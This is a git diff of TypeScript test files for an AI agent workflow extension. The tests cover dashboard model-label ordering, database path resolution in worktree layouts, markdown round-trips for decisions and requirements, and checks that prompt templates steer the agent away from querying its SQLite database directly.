+    assert.deepStrictEqual(line, null, "backward compat cost: no budget summary line");
 
-{
-  // Only continue-here, no truncation
-  const units = [
-    makeUnit({ truncationSections: 0, continueHereFired: true }),
-  ];
-  const line = renderCostBudgetLine(units);
-  assertTrue(line !== null, "cost budget continue-only: line rendered");
-  assertNoMatch(line!, /truncated/, "cost budget continue-only: no truncation text");
-  assertMatch(line!, /1 continue-here fired/, "cost budget continue-only: shows count");
-}
+    // Aggregation still works
+    const totals = getProjectTotals(oldUnits);
+    assert.deepStrictEqual(totals.totalTruncationSections, 0, "backward compat: truncation total = 0");
+    assert.deepStrictEqual(totals.continueHereFiredCount, 0, "backward compat: continueHere count = 0");
+    assert.deepStrictEqual(totals.units, 2, "backward compat: unit count correct");
+  });
 
-// ─── Backward compat: no budget fields ────────────────────────────────────────
+  // ─── Edge cases ───────────────────────────────────────────────────────────────
 
-console.log("\n=== Backward compat: no budget data ===");
+  test('Edge cases', () => {
+    // formatTokenCount for context window values
+    assert.deepStrictEqual(formatTokenCount(200000), "200.0k", "format: 200000 → 200.0k");
+    assert.deepStrictEqual(formatTokenCount(128000), "128.0k", "format: 128000 → 128.0k");
+    assert.deepStrictEqual(formatTokenCount(1000000), "1.00M", "format: 1000000 → 1.00M");
+    assert.deepStrictEqual(formatTokenCount(32000), "32.0k", "format: 32000 → 32.0k");
+  });
 
-{
-  // Old-format units without budget fields — no indicators anywhere
-  const oldUnits = [
-    makeUnit(), // no budget fields
-    makeUnit({ id: "M001/S01/T02" }),
-  ];
+  {
+    // Completed unit key includes type — different types don't collide
+    const ledgerUnits = [
+      makeUnit({ type: "research-slice", id: "M001/S01", truncationSections: 2 }),
+      makeUnit({ type: "plan-slice", id: "M001/S01", truncationSections: 5 }),
+    ];
+    const researchMarkers = renderCompletedBudgetMarkers(
+      { type: "research-slice", id: "M001/S01" },
+      ledgerUnits,
+    );
+    const planMarkers = renderCompletedBudgetMarkers(
+      { type: "plan-slice", id: "M001/S01" },
+      ledgerUnits,
+    );
+    assert.match(researchMarkers, /▼2/, "type-keying: research unit gets its own truncation count");
+    assert.match(planMarkers, /▼5/, "type-keying: plan unit gets its own truncation count");
+  }
 
-  // Completed section: no markers
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    oldUnits,
-  );
-  assertNoMatch(markers, /▼/, "backward compat completed: no truncation marker");
-  assertNoMatch(markers, /wrap-up/, "backward compat completed: no wrap-up marker");
-  assertEq(markers, "", "backward compat completed: empty markers string");
+  // ─── Summary ──────────────────────────────────────────────────────────────────
 
-  // By Model section: no context window label
-  const label = renderModelContextWindow(oldUnits, "claude-sonnet-4-20250514");
-  assertEq(label, null, "backward compat by-model: no context window label");
-
-  // Cost & Usage: no budget line
-  const line = renderCostBudgetLine(oldUnits);
-  assertEq(line, null, "backward compat cost: no budget summary line");
-
-  // Aggregation still works
-  const totals = getProjectTotals(oldUnits);
-  assertEq(totals.totalTruncationSections, 0, "backward compat: truncation total = 0");
-  assertEq(totals.continueHereFiredCount, 0, "backward compat: continueHere count = 0");
-  assertEq(totals.units, 2, "backward compat: unit count correct");
-}
-
-// ─── Edge cases ───────────────────────────────────────────────────────────────
-
-console.log("\n=== Edge cases ===");
-
-{
-  // formatTokenCount for context window values
-  assertEq(formatTokenCount(200000), "200.0k", "format: 200000 → 200.0k");
-  assertEq(formatTokenCount(128000), "128.0k", "format: 128000 → 128.0k");
-  assertEq(formatTokenCount(1000000), "1.00M", "format: 1000000 → 1.00M");
-  assertEq(formatTokenCount(32000), "32.0k", "format: 32000 → 32.0k");
-}
-
-{
-  // Completed unit key includes type — different types don't collide
-  const ledgerUnits = [
-    makeUnit({ type: "research-slice", id: "M001/S01", truncationSections: 2 }),
-    makeUnit({ type: "plan-slice", id: "M001/S01", truncationSections: 5 }),
-  ];
-  const researchMarkers = renderCompletedBudgetMarkers(
-    { type: "research-slice", id: "M001/S01" },
-    ledgerUnits,
-  );
-  const planMarkers = renderCompletedBudgetMarkers(
-    { type: "plan-slice", id: "M001/S01" },
-    ledgerUnits,
-  );
-  assertMatch(researchMarkers, /▼2/, "type-keying: research unit gets its own truncation count");
-  assertMatch(planMarkers, /▼5/, "type-keying: plan unit gets its own truncation count");
-}
-
-// ─── Summary ──────────────────────────────────────────────────────────────────
-
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/dashboard-model-label-ordering.test.ts b/src/resources/extensions/gsd/tests/dashboard-model-label-ordering.test.ts
new file mode 100644
index 000000000..ad28398a2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/dashboard-model-label-ordering.test.ts
@@ -0,0 +1,107 @@
+/**
+ * dashboard-model-label-ordering.test.ts — Regression test for #2899.
+ *
+ * The dashboard model label was showing the previous unit's model because
+ * updateProgressWidget was called before selectAndApplyModel in phases.ts.
+ * This test verifies:
+ *   1. updateProgressWidget is called AFTER selectAndApplyModel in phases.ts
+ *   2. session.ts has a currentDispatchedModelId field
+ *   3. auto.ts exposes getCurrentDispatchedModelId in widgetStateAccessors
+ *   4. auto-dashboard.ts reads from a dispatched model accessor, not cmdCtx?.model
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, assertMatch, report } = createTestContext();
+
+const phasesPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const sessionPath = join(import.meta.dirname, "..", "auto", "session.ts");
+const autoPath = join(import.meta.dirname, "..", "auto.ts");
+const dashboardPath = join(import.meta.dirname, "..", "auto-dashboard.ts");
+
+const phasesSrc = readFileSync(phasesPath, "utf-8");
+const sessionSrc = readFileSync(sessionPath, "utf-8");
+const autoSrc = readFileSync(autoPath, "utf-8");
+const dashboardSrc = readFileSync(dashboardPath, "utf-8");
+
+console.log("\n=== #2899: Dashboard model label shows correct (dispatched) model ===");
+
+// ── Test 1: updateProgressWidget is called AFTER selectAndApplyModel ──────
+
+// Find the positions of the calls in the dispatch function body.
+// selectAndApplyModel must appear BEFORE updateProgressWidget.
+const selectModelPos = phasesSrc.indexOf("deps.selectAndApplyModel(");
+const updateWidgetPos = phasesSrc.indexOf("deps.updateProgressWidget(");
+
+assertTrue(
+  selectModelPos > 0,
+  "phases.ts contains deps.selectAndApplyModel call",
+);
+
+assertTrue(
+  updateWidgetPos > 0,
+  "phases.ts contains deps.updateProgressWidget call",
+);
+
+assertTrue(
+  selectModelPos < updateWidgetPos,
+  `selectAndApplyModel (pos ${selectModelPos}) must be called BEFORE updateProgressWidget (pos ${updateWidgetPos}) — widget needs fresh model`,
+);
+
+// ── Test 2: session.ts declares currentDispatchedModelId ──────────────────
+
+assertTrue(
+  sessionSrc.includes("currentDispatchedModelId"),
+  "session.ts has currentDispatchedModelId field",
+);
+
+// ── Test 3: auto.ts exposes getCurrentDispatchedModelId in widgetStateAccessors ──
+
+assertTrue(
+  autoSrc.includes("getCurrentDispatchedModelId"),
+  "auto.ts exposes getCurrentDispatchedModelId accessor",
+);
+
+// Verify it's in the widgetStateAccessors object
+const accessorsBlock = autoSrc.slice(
+  autoSrc.indexOf("const widgetStateAccessors"),
+  autoSrc.indexOf("};", autoSrc.indexOf("const widgetStateAccessors")) + 2,
+);
+
+assertTrue(
+  accessorsBlock.includes("getCurrentDispatchedModelId"),
+  "getCurrentDispatchedModelId is in the widgetStateAccessors object",
+);
+
+// ── Test 4: WidgetStateAccessors interface has getCurrentDispatchedModelId ──
+
+assertTrue(
+  dashboardSrc.includes("getCurrentDispatchedModelId"),
+  "auto-dashboard.ts references getCurrentDispatchedModelId",
+);
+
+// The dashboard render closure should NOT read model from cmdCtx?.model for display.
+// It should use the accessor for the dispatched model ID.
+// Check that the "Model display" section uses the accessor, not cmdCtx?.model directly.
+const modelDisplaySection = dashboardSrc.slice(
+  dashboardSrc.indexOf("// Model display"),
+  dashboardSrc.indexOf("// Model display") + 500,
+);
+
+assertTrue(
+  modelDisplaySection.includes("getCurrentDispatchedModelId") ||
+  modelDisplaySection.includes("getDispatchedModelId"),
+  "Model display section reads from dispatched model accessor, not cmdCtx?.model alone",
+);
+
+// ── Test 5: currentDispatchedModelId is set after selectAndApplyModel in phases.ts ──
+
+// After selectAndApplyModel returns, phases.ts should store the dispatched model ID
+assertTrue(
+  phasesSrc.includes("currentDispatchedModelId"),
+  "phases.ts stores currentDispatchedModelId after model selection",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/db-access-guardrails.test.ts b/src/resources/extensions/gsd/tests/db-access-guardrails.test.ts
new file mode 100644
index 000000000..733def9d5
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/db-access-guardrails.test.ts
@@ -0,0 +1,109 @@
+// GSD2 — Regression tests: DB anti-pattern guardrails in prompt templates
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, readdirSync } from "node:fs";
+import { join } from "node:path";
+
+const promptsDir = join(process.cwd(), "src/resources/extensions/gsd/prompts");
+
+function readPrompt(name: string): string {
+  return readFileSync(join(promptsDir, `${name}.md`), "utf-8");
+}
+
+// ─── Layer 1: system.md global guardrail ──────────────────────────────────────
+
+test("system.md anti-patterns section prohibits direct .gsd/gsd.db access", () => {
+  const prompt = readPrompt("system");
+  assert.match(
+    prompt,
+    /Never query.*\.gsd\/gsd\.db.*directly/i,
+    "system.md must prohibit direct .gsd/gsd.db access in the anti-patterns section",
+  );
+  assert.match(prompt, /sqlite3/, "system.md DB guardrail must name the sqlite3 CLI");
+  assert.match(prompt, /better-sqlite3/, "system.md DB guardrail must name better-sqlite3");
+  assert.match(prompt, /gsd_\*/, "system.md DB guardrail must redirect to gsd_* tools");
+});
+
+test("system.md DB guardrail explains single-writer WAL risk", () => {
+  const prompt = readPrompt("system");
+  assert.match(prompt, /single-writer WAL/i, "system.md must explain the WAL architecture risk");
+});
+
+// ─── Layer 2: high-risk prompt guardrails ─────────────────────────────────────
+
+test("validate-milestone.md contains DB access safety guardrail with tool redirect", () => {
+  const prompt = readPrompt("validate-milestone");
+  assert.match(prompt, /DB access safety/i, "validate-milestone.md must have DB access safety section");
+  assert.match(prompt, /gsd_milestone_status/, "validate-milestone.md must name gsd_milestone_status as alternative");
+  assert.match(prompt, /Do NOT query.*\.gsd\/gsd\.db/i, "validate-milestone.md must prohibit direct DB queries");
+});
+
+test("complete-milestone.md contains DB access safety guardrail with tool redirect", () => {
+  const prompt = readPrompt("complete-milestone");
+  assert.match(prompt, /DB access safety/i, "complete-milestone.md must have DB access safety section");
+  assert.match(prompt, /gsd_milestone_status/, "complete-milestone.md must name gsd_milestone_status as alternative");
+  assert.match(prompt, /Do NOT query.*\.gsd\/gsd\.db/i, "complete-milestone.md must prohibit direct DB queries");
+});
+
+test("doctor-heal.md contains DB access guardrail naming gsd_milestone_status", () => {
+  const prompt = readPrompt("doctor-heal");
+  assert.match(prompt, /gsd_milestone_status/, "doctor-heal.md must name gsd_milestone_status as the DB inspection tool");
+  assert.match(prompt, /Do NOT query.*\.gsd\/gsd\.db/i, "doctor-heal.md must prohibit direct DB queries");
+});
+
+test("forensics.md contains DB inspection guardrail", () => {
+  const prompt = readPrompt("forensics");
+  assert.match(prompt, /gsd_milestone_status/, "forensics.md must name gsd_milestone_status as the DB inspection tool");
+  assert.match(prompt, /sqlite3.*\.gsd\/gsd\.db/i, "forensics.md must prohibit sqlite3 against .gsd/gsd.db");
+});
+
+test("reassess-roadmap.md contains DB access safety guardrail", () => {
+  const prompt = readPrompt("reassess-roadmap");
+  assert.match(prompt, /DB access safety/i, "reassess-roadmap.md must have DB access safety section");
+  assert.match(prompt, /gsd_milestone_status/, "reassess-roadmap.md must name gsd_milestone_status as alternative");
+});
+
+// ─── Negative assertion: no prompt instructs running sqlite3 as a command ─────
+
+test("no prompt file contains an unguarded sqlite3 command invocation", () => {
+  const files = readdirSync(promptsDir).filter((f) => f.endsWith(".md"));
+  assert.ok(files.length >= 35, `Expected at least 35 prompt files, found ${files.length}`);
+
+  const violations: string[] = [];
+
+  for (const file of files) {
+    const content = readFileSync(join(promptsDir, file), "utf-8");
+    const lines = content.split("\n");
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i];
+      const trimmed = line.trim();
+
+      // Match lines containing sqlite3 targeting gsd.db in any common form:
+      //   sqlite3 .gsd/gsd.db, sqlite3 ./.gsd/gsd.db, sqlite3 "/path/.gsd/gsd.db",
+      //   sqlite3 -header .gsd/gsd.db, etc.
+      // Guardrail text that says "Never run" or "Do NOT query" is fine — only flag
+      // lines where these appear without a surrounding prohibition keyword.
+      if (/sqlite3\b.*gsd\.db/.test(trimmed)) {
+        const context = lines.slice(Math.max(0, i - 3), i + 1).join(" ");
+        if (!/Never|Do NOT|do not|don't|prohibited|forbidden|never run/i.test(context)) {
+          violations.push(`${file}:${i + 1} — unguarded sqlite3 command: ${trimmed}`);
+        }
+      }
+      // Match node -e with better-sqlite3 require in any quoting style
+      if (/node\s+-e\s+.*(?:require|import).*better-sqlite3/.test(trimmed)) {
+        const context = lines.slice(Math.max(0, i - 3), i + 1).join(" ");
+        if (!/Never|Do NOT|do not|don't|prohibited|forbidden|never run/i.test(context)) {
+          violations.push(`${file}:${i + 1} — unguarded node -e require command: ${trimmed}`);
+        }
+      }
+    }
+  }
+
+  assert.deepEqual(
+    violations,
+    [],
+    `Found prompts with unguarded sqlite3/better-sqlite3 invocations:\n${violations.join("\n")}`,
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/db-path-worktree-symlink.test.ts b/src/resources/extensions/gsd/tests/db-path-worktree-symlink.test.ts
new file mode 100644
index 000000000..7183e7dd7
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/db-path-worktree-symlink.test.ts
@@ -0,0 +1,135 @@
+/**
+ * db-path-worktree-symlink.test.ts — #2517
+ *
+ * Regression test for the db_unavailable loop in worktree/symlink layouts.
+ *
+ * The path resolver must handle BOTH worktree path families:
+ *   - /.gsd/worktrees/<MID>/...           (direct layout)
+ *   - /.gsd/projects/<hash>/worktrees/<MID>/...  (symlink-resolved layout)
+ *
+ * When the second layout is not recognised, ensureDbOpen derives a wrong DB
+ * path, the open fails silently, and every completion tool call returns
+ * db_unavailable — triggering an artifact retry re-dispatch loop.
+ *
+ * Additionally, the post-unit artifact retry path must NOT retry when the
+ * completion tool failed due to db_unavailable (infra failure), because
+ * retrying can never succeed and causes cost spikes.
+ */
+
+import { readFileSync } from "node:fs";
+import { join, sep } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+// ── Part 1: resolveProjectRootDbPath handles symlink-resolved layout ─────
+
+console.log("\n=== #2517 Part 1: resolveProjectRootDbPath symlink layout ===");
+
+// Import the resolver directly
+const { resolveProjectRootDbPath } = await import("../bootstrap/dynamic-tools.js");
+
+// Standard worktree layout (already works)
+const standardPath = `/home/user/myproject/.gsd/worktrees/M001/work`;
+const standardResult = resolveProjectRootDbPath(standardPath);
+assertEq(
+  standardResult,
+  join("/home/user/myproject", ".gsd", "gsd.db"),
+  "Standard worktree layout resolves to project root DB path",
+);
+
+// Symlink-resolved layout: /.gsd/projects/<hash>/worktrees/...
+// After PR #2952, these paths resolve to the hash-level DB (same as external-state),
+// because on POSIX getcwd() returns the canonical (symlink-resolved) path anyway, so
+// a path like <proj>/.gsd/projects/<hash>/worktrees/ in practice is always
+// ~/.gsd/projects/<hash>/worktrees/ after the OS resolves the .gsd symlink.
+const symlinkPath = `/home/user/myproject/.gsd/projects/abc123def/worktrees/M001/work`;
+const symlinkResult = resolveProjectRootDbPath(symlinkPath);
+assertEq(
+  symlinkResult,
+  join("/home/user/myproject/.gsd/projects/abc123def", "gsd.db"),
+  "/.gsd/projects/<hash>/worktrees/ resolves to hash-level DB (#2517, updated for #2952)",
+);
+
+// Windows-style separators for symlink layout
+if (sep === "\\") {
+  const winSymlinkPath = `C:\\Users\\dev\\project\\.gsd\\projects\\abc123def\\worktrees\\M001\\work`;
+  const winResult = resolveProjectRootDbPath(winSymlinkPath);
+  assertEq(
+    winResult,
+    join("C:\\Users\\dev\\project\\.gsd\\projects\\abc123def", "gsd.db"),
+    "Windows /.gsd/projects/<hash>/worktrees/ resolves to hash-level DB",
+  );
+} else {
+  // On non-Windows, test forward-slash variant explicitly
+  const fwdSymlinkPath = `/home/user/myproject/.gsd/projects/abc123def/worktrees/M001/work`;
+  const fwdResult = resolveProjectRootDbPath(fwdSymlinkPath);
+  assertEq(
+    fwdResult,
+    join("/home/user/myproject/.gsd/projects/abc123def", "gsd.db"),
+    "Forward-slash /.gsd/projects/<hash>/worktrees/ resolves to hash-level DB on POSIX",
+  );
+}
+
+// Edge: deeper nesting under projects/<hash>/worktrees
+const deepSymlinkPath = `/home/user/myproject/.gsd/projects/deadbeef42/worktrees/M003/sub/dir`;
+const deepResult = resolveProjectRootDbPath(deepSymlinkPath);
+assertEq(
+  deepResult,
+  join("/home/user/myproject/.gsd/projects/deadbeef42", "gsd.db"),
+  "Deep /.gsd/projects/<hash>/worktrees/ path resolves to hash-level DB (#2952)",
+);
+
+// Non-worktree path should be unchanged
+const normalPath = `/home/user/myproject`;
+const normalResult = resolveProjectRootDbPath(normalPath);
+assertEq(
+  normalResult,
+  join("/home/user/myproject", ".gsd", "gsd.db"),
+  "Non-worktree path is unchanged",
+);
+
+// ── Part 2: ensureDbOpen returns structured failure context ──────────────
+
+console.log("\n=== #2517 Part 2: ensureDbOpen structured diagnostics ===");
+
+const dynamicToolsSrc = readFileSync(
+  join(import.meta.dirname, "..", "bootstrap", "dynamic-tools.ts"),
+  "utf-8",
+);
+
+// ensureDbOpen should surface diagnostic context, not just boolean false
+// Check that the catch block logs error details via workflow-logger
+assertTrue(
+  dynamicToolsSrc.includes("ensureDbOpen failed") && dynamicToolsSrc.includes("logWarning"),
+  "ensureDbOpen catch block surfaces diagnostic information via logWarning instead of bare false (#2517)",
+);
+
+// ── Part 3: post-unit does NOT artifact-retry on db_unavailable ──────────
+
+console.log("\n=== #2517 Part 3: post-unit db_unavailable is infra-fatal ===");
+
+const postUnitSrc = readFileSync(
+  join(import.meta.dirname, "..", "auto-post-unit.ts"),
+  "utf-8",
+);
+
+// The artifact retry block should check DB availability and skip retry
+// when the DB is unavailable (infra failure, not a missing artifact).
+assertTrue(
+  postUnitSrc.includes("db_unavailable") || postUnitSrc.includes("isDbAvailable"),
+  "post-unit artifact retry path checks DB availability to avoid retry loop (#2517)",
+);
+
+// Verify the retry block is guarded: when !isDbAvailable(), the code must
+// NOT return "retry". The pattern should be: if (!verified && !isDbAvailable()) { skip }
+// followed by else if (!verified) { ... return "retry" }
+const dbUnavailableGuard = postUnitSrc.match(
+  /!triggerArtifactVerified\s*&&\s*!isDbAvailable\(\)/,
+);
+assertTrue(
+  !!dbUnavailableGuard,
+  "The retry block explicitly guards against !isDbAvailable() before returning 'retry' (#2517)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/db-writer.test.ts b/src/resources/extensions/gsd/tests/db-writer.test.ts
index fbde354a0..5a61bd131 100644
--- a/src/resources/extensions/gsd/tests/db-writer.test.ts
+++ b/src/resources/extensions/gsd/tests/db-writer.test.ts
@@ -1,4 +1,5 @@
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import * as path from 'node:path';
 import * as os from 'node:os';
 import * as fs from 'node:fs';
@@ -23,11 +24,10 @@ import {
   saveDecisionToDb,
   updateRequirementInDb,
   saveArtifactToDb,
+  extractDeferredSliceRef,
 } from '../db-writer.ts';
 import type { Decision, Requirement } from '../types.ts';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
 // ═══════════════════════════════════════════════════════════════════════════
 // Helpers
 // ═══════════════════════════════════════════════════════════════════════════
@@ -151,462 +151,681 @@ const SAMPLE_REQUIREMENTS: Requirement[] = [
 // Round-Trip Tests: Decisions
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n── generateDecisionsMd round-trip ──');
+describe('db-writer', () => {
+  test('generateDecisionsMd round-trip', () => {
+    const md = generateDecisionsMd(SAMPLE_DECISIONS);
+    const parsed = parseDecisionsTable(md);
 
-{
-  const md = generateDecisionsMd(SAMPLE_DECISIONS);
-  const parsed = parseDecisionsTable(md);
+    assert.deepStrictEqual(parsed.length, SAMPLE_DECISIONS.length, 'decisions count matches');
 
-  assertEq(parsed.length, SAMPLE_DECISIONS.length, 'decisions count matches');
+    for (let i = 0; i < SAMPLE_DECISIONS.length; i++) {
+      const orig = SAMPLE_DECISIONS[i];
+      const rt = parsed[i];
+      assert.deepStrictEqual(rt.id, orig.id, `decision ${orig.id} id round-trips`);
+      assert.deepStrictEqual(rt.when_context, orig.when_context, `decision ${orig.id} when_context round-trips`);
+      assert.deepStrictEqual(rt.scope, orig.scope, `decision ${orig.id} scope round-trips`);
+      assert.deepStrictEqual(rt.decision, orig.decision, `decision ${orig.id} decision round-trips`);
+      assert.deepStrictEqual(rt.choice, orig.choice, `decision ${orig.id} choice round-trips`);
+      assert.deepStrictEqual(rt.rationale, orig.rationale, `decision ${orig.id} rationale round-trips`);
+      assert.deepStrictEqual(rt.revisable, orig.revisable, `decision ${orig.id} revisable round-trips`);
+      assert.deepStrictEqual(rt.made_by, orig.made_by, `decision ${orig.id} made_by round-trips`);
+    }
+  });
 
-  for (let i = 0; i < SAMPLE_DECISIONS.length; i++) {
-    const orig = SAMPLE_DECISIONS[i];
-    const rt = parsed[i];
-    assertEq(rt.id, orig.id, `decision ${orig.id} id round-trips`);
-    assertEq(rt.when_context, orig.when_context, `decision ${orig.id} when_context round-trips`);
-    assertEq(rt.scope, orig.scope, `decision ${orig.id} scope round-trips`);
-    assertEq(rt.decision, orig.decision, `decision ${orig.id} decision round-trips`);
-    assertEq(rt.choice, orig.choice, `decision ${orig.id} choice round-trips`);
-    assertEq(rt.rationale, orig.rationale, `decision ${orig.id} rationale round-trips`);
-    assertEq(rt.revisable, orig.revisable, `decision ${orig.id} revisable round-trips`);
-    assertEq(rt.made_by, orig.made_by, `decision ${orig.id} made_by round-trips`);
-  }
-}
+  test('generateDecisionsMd format', () => {
+    const md = generateDecisionsMd(SAMPLE_DECISIONS);
+    assert.ok(md.startsWith('# Decisions Register\n'), 'starts with H1 header');
+    assert.ok(md.includes('<!-- Append-only'), 'contains HTML comment block');
+    assert.ok(md.includes('| # | When | Scope'), 'contains table header');
+    assert.ok(md.includes('|---|------|-------'), 'contains separator row');
+    assert.ok(md.includes('| Made By |'), 'contains Made By column header');
+  });
 
-console.log('\n── generateDecisionsMd format ──');
+  test('generateDecisionsMd empty input', () => {
+    const md = generateDecisionsMd([]);
+    const parsed = parseDecisionsTable(md);
+    assert.deepStrictEqual(parsed.length, 0, 'empty decisions produces empty parse');
+    assert.ok(md.includes('| # | When | Scope'), 'still has table header even when empty');
+  });
 
-{
-  const md = generateDecisionsMd(SAMPLE_DECISIONS);
-  assertTrue(md.startsWith('# Decisions Register\n'), 'starts with H1 header');
-  assertTrue(md.includes('<!-- Append-only'), 'contains HTML comment block');
-  assertTrue(md.includes('| # | When | Scope'), 'contains table header');
-  assertTrue(md.includes('|---|------|-------'), 'contains separator row');
-  assertTrue(md.includes('| Made By |'), 'contains Made By column header');
-}
+  test('generateDecisionsMd pipe escaping', () => {
+    const withPipe: Decision = {
+      seq: 1,
+      id: 'D001',
+      when_context: 'M001',
+      scope: 'arch',
+      decision: 'Choice A | Choice B comparison',
+      choice: 'A',
+      rationale: 'Better',
+      revisable: 'No',
+      made_by: 'agent',
+      superseded_by: null,
+    };
+    const md = generateDecisionsMd([withPipe]);
+    // Should not break the table — pipe in decision text should be escaped
+    const parsed = parseDecisionsTable(md);
+    assert.ok(parsed.length >= 1, 'pipe-containing decision parses without breaking table');
+  });
 
-console.log('\n── generateDecisionsMd empty input ──');
+  // ═══════════════════════════════════════════════════════════════════════════
+  // Round-Trip Tests: Requirements
+  // ═══════════════════════════════════════════════════════════════════════════
 
-{
-  const md = generateDecisionsMd([]);
-  const parsed = parseDecisionsTable(md);
-  assertEq(parsed.length, 0, 'empty decisions produces empty parse');
-  assertTrue(md.includes('| # | When | Scope'), 'still has table header even when empty');
-}
+  test('generateRequirementsMd round-trip', () => {
+    const md = generateRequirementsMd(SAMPLE_REQUIREMENTS);
+    const parsed = parseRequirementsSections(md);
 
-console.log('\n── generateDecisionsMd pipe escaping ──');
+    assert.deepStrictEqual(parsed.length, SAMPLE_REQUIREMENTS.length, 'requirements count matches');
 
-{
-  const withPipe: Decision = {
-    seq: 1,
-    id: 'D001',
-    when_context: 'M001',
-    scope: 'arch',
-    decision: 'Choice A | Choice B comparison',
-    choice: 'A',
-    rationale: 'Better',
-    revisable: 'No',
-    made_by: 'agent',
-    superseded_by: null,
-  };
-  const md = generateDecisionsMd([withPipe]);
-  // Should not break the table — pipe in decision text should be escaped
-  const parsed = parseDecisionsTable(md);
-  assertTrue(parsed.length >= 1, 'pipe-containing decision parses without breaking table');
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// Round-Trip Tests: Requirements
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── generateRequirementsMd round-trip ──');
-
-{
-  const md = generateRequirementsMd(SAMPLE_REQUIREMENTS);
-  const parsed = parseRequirementsSections(md);
-
-  assertEq(parsed.length, SAMPLE_REQUIREMENTS.length, 'requirements count matches');
-
-  for (const orig of SAMPLE_REQUIREMENTS) {
-    const rt = parsed.find(r => r.id === orig.id);
-    assertTrue(!!rt, `requirement ${orig.id} found in parsed output`);
-    if (rt) {
-      assertEq(rt.class, orig.class, `requirement ${orig.id} class round-trips`);
-      assertEq(rt.description, orig.description, `requirement ${orig.id} description round-trips`);
-      assertEq(rt.why, orig.why, `requirement ${orig.id} why round-trips`);
-      assertEq(rt.source, orig.source, `requirement ${orig.id} source round-trips`);
-      assertEq(rt.primary_owner, orig.primary_owner, `requirement ${orig.id} primary_owner round-trips`);
-      assertEq(rt.supporting_slices, orig.supporting_slices, `requirement ${orig.id} supporting_slices round-trips`);
-      if (orig.notes) {
-        assertEq(rt.notes, orig.notes, `requirement ${orig.id} notes round-trips`);
+    for (const orig of SAMPLE_REQUIREMENTS) {
+      const rt = parsed.find(r => r.id === orig.id);
+      assert.ok(!!rt, `requirement ${orig.id} found in parsed output`);
+      if (rt) {
+        assert.deepStrictEqual(rt.class, orig.class, `requirement ${orig.id} class round-trips`);
+        assert.deepStrictEqual(rt.description, orig.description, `requirement ${orig.id} description round-trips`);
+        assert.deepStrictEqual(rt.why, orig.why, `requirement ${orig.id} why round-trips`);
+        assert.deepStrictEqual(rt.source, orig.source, `requirement ${orig.id} source round-trips`);
+        assert.deepStrictEqual(rt.primary_owner, orig.primary_owner, `requirement ${orig.id} primary_owner round-trips`);
+        assert.deepStrictEqual(rt.supporting_slices, orig.supporting_slices, `requirement ${orig.id} supporting_slices round-trips`);
+        if (orig.notes) {
+          assert.deepStrictEqual(rt.notes, orig.notes, `requirement ${orig.id} notes round-trips`);
+        }
       }
     }
-  }
-}
-
-console.log('\n── generateRequirementsMd sections ──');
-
-{
-  const md = generateRequirementsMd(SAMPLE_REQUIREMENTS);
-  assertTrue(md.includes('## Active'), 'has Active section');
-  assertTrue(md.includes('## Validated'), 'has Validated section');
-  assertTrue(md.includes('## Deferred'), 'has Deferred section');
-  assertTrue(md.includes('## Out of Scope'), 'has Out of Scope section');
-  assertTrue(md.includes('## Traceability'), 'has Traceability section');
-  assertTrue(md.includes('## Coverage Summary'), 'has Coverage Summary section');
-}
-
-console.log('\n── generateRequirementsMd only populated sections ──');
-
-{
-  // Only active requirements — should only have Active section
-  const activeOnly = SAMPLE_REQUIREMENTS.filter(r => r.status === 'active');
-  const md = generateRequirementsMd(activeOnly);
-  assertTrue(md.includes('## Active'), 'has Active section');
-  assertTrue(!md.includes('## Validated'), 'no Validated section when no validated reqs');
-  assertTrue(!md.includes('## Deferred'), 'no Deferred section when no deferred reqs');
-  assertTrue(!md.includes('## Out of Scope'), 'no Out of Scope section when no out-of-scope reqs');
-}
-
-console.log('\n── generateRequirementsMd empty input ──');
-
-{
-  const md = generateRequirementsMd([]);
-  const parsed = parseRequirementsSections(md);
-  assertEq(parsed.length, 0, 'empty requirements produces empty parse');
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// nextDecisionId Tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── nextDecisionId ──');
-
-{
-  // Open in-memory DB
-  openDatabase(':memory:');
-
-  const id1 = await nextDecisionId();
-  assertEq(id1, 'D001', 'first ID when no decisions exist');
-
-  // Insert some decisions
-  upsertDecision({
-    id: 'D001',
-    when_context: 'M001',
-    scope: 'test',
-    decision: 'test decision',
-    choice: 'test choice',
-    rationale: 'test',
-    revisable: 'No',
-    made_by: 'agent',
-    superseded_by: null,
-  });
-  upsertDecision({
-    id: 'D005',
-    when_context: 'M001',
-    scope: 'test',
-    decision: 'test decision 5',
-    choice: 'test choice',
-    rationale: 'test',
-    revisable: 'No',
-    made_by: 'agent',
-    superseded_by: null,
   });
 
-  const id2 = await nextDecisionId();
-  assertEq(id2, 'D006', 'next ID after D005 is D006');
+  test('generateRequirementsMd sections', () => {
+    const md = generateRequirementsMd(SAMPLE_REQUIREMENTS);
+    assert.ok(md.includes('## Active'), 'has Active section');
+    assert.ok(md.includes('## Validated'), 'has Validated section');
+    assert.ok(md.includes('## Deferred'), 'has Deferred section');
+    assert.ok(md.includes('## Out of Scope'), 'has Out of Scope section');
+    assert.ok(md.includes('## Traceability'), 'has Traceability section');
+    assert.ok(md.includes('## Coverage Summary'), 'has Coverage Summary section');
+  });
 
-  closeDatabase();
-}
+  test('generateRequirementsMd only populated sections', () => {
+    // Only active requirements — should only have Active section
